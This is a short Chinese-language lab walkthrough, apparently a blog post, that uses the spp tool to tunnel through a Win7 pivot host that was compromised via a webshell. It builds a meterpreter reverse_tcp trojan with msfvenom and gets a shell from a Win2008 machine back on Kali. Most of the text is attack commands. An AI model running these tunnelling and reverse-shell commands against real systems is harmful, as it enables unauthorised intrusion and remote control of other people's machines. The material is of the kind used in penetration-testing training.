SPP端口转发-反向代理

下载地址 : https://github.com/esrrhs/spp
image.png
Kali:
启动服务端

1
./spp -type server -proto tcp -listen :8888 -proto ricmp -listen 0.0.0.0      

image.png

WIN7 :
通过webshell 上传spp
先搭建个反向socks5代理,进入内网

1
./spp.exe -name "16" -type reverse_socks5_client -server 192.168.145.130:8888 -fromaddr :1080 -proxyproto tcp 

image.png

WIN2008 :
MSF生成木马文件,上传木马文件 shell.exe

1
2
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.143  LPORT=8888 -f exe > shell.exe

这里生成的IP是win7 跳板机的 8888端口
image.png
跳板机Win7运行spp tcp正向代理

1
./spp.exe -name "shiliu" -type proxy_client -server 192.168.145.130:8888 -fromaddr :8888 -toaddr :7777 -proxyproto tcp 

image.png

Kali:
启动监听

image.png

win2008 :
运行shell.exe
Kali 获取shell
image.png